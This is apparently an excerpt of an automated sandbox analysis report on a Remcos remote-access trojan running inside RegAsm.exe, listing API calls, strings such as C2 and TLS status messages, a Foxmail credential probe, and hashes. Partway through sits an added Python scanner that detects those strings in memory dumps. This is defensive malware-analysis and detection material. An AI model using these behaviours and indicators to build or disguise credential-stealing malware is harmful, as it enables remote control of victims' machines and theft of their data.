                                                                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                        • String ID:
                                                                        • API String ID: 3950776272-0
                                                                        • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                                        • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                                        APIs
                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,@5U), ref: 0041B62A
                                                                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Name$ComputerUser
                                                                        • String ID: @5U
                                                                        • API String ID: 4229901323-921383711
                                                                        • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                        • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00559630), ref: 00433849
                                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                        • String ID:
                                                                        • API String ID: 1815803762-0
                                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                                        Strings
                                                                        • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Time$FileSystem
                                                                        • String ID: GetSystemTimePreciseAsFileTime
                                                                        • API String ID: 2086374402-595813830
                                                                        • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                                        • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                                        • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                                        • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                        • Instruction Fuzzy Hash:

                                                                        Control-flow Graph

                                                                        Control-flow graph of function 0040E9C5 (graph rendering not reproduced). API calls appearing in the graph nodes: GetModuleFileNameW, CreateThread, StrToIntA, SetProcessDEPPolicy, DeleteFileW, Sleep.
                                                                        APIs
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                        • String ID: sU$8SG$8SG$@5U$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-R2I0JW$Software\$User$`2U$dMG$del$del$exepath$licence$license_code.txt
                                                                        • API String ID: 2830904901-2913333753
                                                                        • Opcode ID: 0ddb8f7fe896439c3356cabd6246e43da0fa9b57f35507021f4f8b6732c3ecef
                                                                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                        • Opcode Fuzzy Hash: 0ddb8f7fe896439c3356cabd6246e43da0fa9b57f35507021f4f8b6732c3ecef
                                                                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                                                        Control-flow Graph

                                                                        Control-flow graph of function 00414F2A (graph rendering not reproduced). API calls appearing in the graph nodes: Sleep, WSAGetLastError, GetTickCount, CreateThread.
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,00000029,004752F0,@5U,00000000), ref: 00414F7B
                                                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                        • String ID: sU$ | $%I64u$5.0.0 Pro$8SG$@5U$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-R2I0JW$TLS Off$TLS On $`2U$dMG$hlight$name$NG$NG
                                                                        • API String ID: 524882891-140671004
                                                                        • Opcode ID: c51202c70a3ec075000535c4165a027f275f208f431bf3365679d4806e8f145b
                                                                        • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                                        • Opcode Fuzzy Hash: c51202c70a3ec075000535c4165a027f275f208f431bf3365679d4806e8f145b
                                                                        • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                                                        Control-flow Graph: rendering not reproduced. Function 0x412AB4-0x41322C: GetModuleFileNameW at entry, three Sleep(10 ms) retry loops at 0x412C1D, 0x412CBF and 0x412D61, three DeleteFileW calls at 0x412DB6, 0x412DE9 and 0x412E26, a Sleep(500 ms) at 0x412E4D that loops back to 0x412D98, and a Sleep(100 ms) at 0x412E92 that loops back to 0x412AFF.
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63A21986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                                        • Sleep.KERNEL32(00000064), ref: 00412E94
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                                        • API String ID: 1223786279-2576077980
                                                                        • Opcode ID: 0c3532b0c3f0b05011db00d0dcb598a2c0add988ca924e5378daa270bc24d60c
                                                                        • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                                        • Opcode Fuzzy Hash: 0c3532b0c3f0b05011db00d0dcb598a2c0add988ca924e5378daa270bc24d60c
                                                                        • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                          • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                          • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                          • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                          • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                          • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                        • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                        • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                        • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                        • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                        • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                        • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                        • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                        • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                        • String ID: )$Foxmail$ProgramFiles
                                                                        • API String ID: 672098462-2938083778
                                                                        • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                        • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                        • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                        • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                        Control-flow Graph: rendering not reproduced. Function 0x414D86-0x414EE8: GetSystemDirectoryA at 0x414DC8, LoadLibraryA at 0x414DE3 followed by GetProcAddress at 0x414E31 and FreeLibrary at 0x414E3D, a second LoadLibraryA at 0x414E46 with GetProcAddress at 0x414E82 and FreeLibrary at 0x414E8E, then a GetProcAddress loop over 0x414E99-0x414EB0 and a final FreeLibrary at 0x414EB4.
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                        • API String ID: 2490988753-744132762
                                                                        • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                        • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                                        • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                        • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

                                                                        Control-flow Graph: rendering not reproduced. Function 0x4048C8-0x404A9E: connect at entry, WSAGetLastError at 0x404A21 on one branch of the connect result, and two CreateEventW calls in the block 0x4049F9-0x404A14 on the other.
                                                                        APIs
                                                                        • connect.WS2_32(FFFFFFFF,00B64958,00000010), ref: 004048E0
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                        • API String ID: 994465650-2151626615
                                                                        • Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                        • Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                                                                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
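
Added example, not code from the Joe Sandbox report or from the sample: a memory-dump indicator scan built from the strings this report lists in the "String ID" fields of the RegAsm.exe image (the Remcos status and config strings, the \ws2_32 / \wship6 / getaddrinfo resolution strings, "/stext " and the Foxmail probe). It searches a raw image for each string in both ASCII and UTF-16LE, since the sample mixes A and W APIs, and reports virtual addresses so a hit can be cross-referenced with the function addresses above. The group labels, the two-group corroboration threshold and the sample image are this example's own assumptions.

```python
"""Indicator-string scan over a process memory dump.

Added example, not code from the Joe Sandbox report or from the sample.
Strings are copied from the report's "String ID" fields; group names,
the threshold and the sample image are this example's own assumptions.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

# Strings copied from the report's "String ID" fields. The group labels
# are this example's own; the report itself does not group them.
INDICATORS: Dict[str, List[bytes]] = {
    "remcos_status": [
        b"Connection Error: Unable to create socket",
        b"TLS Handshake... |",
        b"TLS Authentication Failed",
        b"Connected | ",
        b"Disconnected",
    ],
    "remcos_config": [b"5.0.0 Pro", b"Rmc-R2I0JW", b"TLS On ", b"TLS Off"],
    "dynamic_getaddrinfo": [
        b"\\ws2_32", b"\\wship6", b"getaddrinfo", b"getnameinfo", b"freeaddrinfo",
    ],
    "mail_client_probe": [b"Foxmail", b"/stext "],
}

Hit = Tuple[int, str, str]  # (virtual address, encoding, indicator)


def scan(dump: bytes, base: int = 0) -> Dict[str, List[Hit]]:
    """Return {group: [(va, encoding, string), ...]} for every occurrence.

    `base` is the image base the report gives for the dump (0x400000 for
    the RegAsm.exe image, 0x10000000 for the injected DLL), so offsets are
    reported as virtual addresses. Each indicator is searched twice, as
    ASCII and as UTF-16LE, because the sample mixes A and W APIs.
    """
    hits: Dict[str, List[Hit]] = defaultdict(list)
    for group, items in INDICATORS.items():
        for needle in items:
            text = needle.decode("ascii")
            for enc, pattern in (("ascii", needle), ("utf-16le", text.encode("utf-16-le"))):
                pos = dump.find(pattern)
                while pos >= 0:
                    hits[group].append((base + pos, enc, text))
                    pos = dump.find(pattern, pos + 1)
    return dict(hits)


def verdict(hits: Dict[str, List[Hit]], min_groups: int = 2) -> bool:
    """Flag the image when at least `min_groups` groups matched.

    The threshold is this example's choice: "getaddrinfo" or "Foxmail"
    alone appears in plenty of legitimate code, so a verdict needs
    corroboration from a second, independent group.
    """
    return sum(1 for h in hits.values() if h) >= min_groups


def build_sample_dump() -> bytes:
    """Constructed test image (not the analysed dump): zero padding with a
    few of the report's strings embedded, one of them UTF-16LE encoded."""
    blob = bytearray(0x100)
    blob += b"Connection Error: Unable to create socket\x00"
    blob += bytes(0x40)
    blob += b"\\wship6\x00getaddrinfo\x00"
    blob += bytes(0x20)
    blob += "Foxmail".encode("utf-16-le") + b"\x00\x00"
    blob += bytes(0x40)
    return bytes(blob)


if __name__ == "__main__":
    image = build_sample_dump()
    found = scan(image, base=0x400000)
    for group, entries in found.items():
        for va, enc, s in entries:
            print(f"{group:20s} 0x{va:08X} {enc:8s} {s!r}")
    print("verdict:", "suspicious" if verdict(found) else "no corroborated hits")
```

Run it against a real dump by replacing build_sample_dump() with the bytes of the .sdmp file and passing the report's image base; the constructed image above places the first Remcos status string at 0x400100, finds the wship6/getaddrinfo pair as ASCII and the Foxmail string only in its UTF-16LE form, and a dump containing nothing but "getaddrinfo" stays below the threshold.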

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                        • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                        • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
